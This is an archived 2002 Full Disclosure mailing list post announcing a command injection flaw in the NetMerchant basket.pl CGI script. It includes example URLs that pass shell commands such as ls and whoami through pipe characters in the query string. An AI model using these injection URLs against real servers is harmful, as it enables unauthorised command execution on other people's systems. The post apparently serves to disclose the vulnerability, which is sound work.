Full Disclosure mailing list archives
[ElectronicSouls] - basket.pl hole
From: es () hush com
Date: Fri, 29 Nov 2002 18:17:56 -0800
-----BEGIN PGP SIGNED MESSAGE----- Dear List, Vux found a deadly hole in basket.pl. Here it is for you. # cat ESnetmerchant.txt (C) 2002 vuxie [ E l e c t r o n i c S o u l s ] RESEARCH! PVT!!! It's NetMerchant BuG. Using your browser you can execute any command on the remo te server but without parametres because it filters 0x20 symbol! Examples: http://www.url.com/cgi-bin/basket.pl/bigheadshop?|command| http://www.url.com/cgi-bin/basket.pl/bigheadshop?|ls| - will execute command ls! http://www.url.com/cgi-bin/basket.pl/bigheadshop?|whoami| - will show you which user are you (apache). etc. greetz: BRAIN STORM , ES-TEAM! # The Electronic Souls Team [ElectronicSouls] (c) 2002 "What's up, Rabbit?" -----BEGIN PGP SIGNATURE----- Version: Hush 2.2 (Java) Note: This signature can be verified at https://www.hushtools.com/verify wlMEARECABMFAj3oH+gMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltqsYAoIRvF3sLrdTB H0to4U+UrKDw/eLxAKCvna7BDFRgOFnX2GNjP/P/7j/7Kw== =yXWx -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [ElectronicSouls] - basket.pl hole es (Nov 29)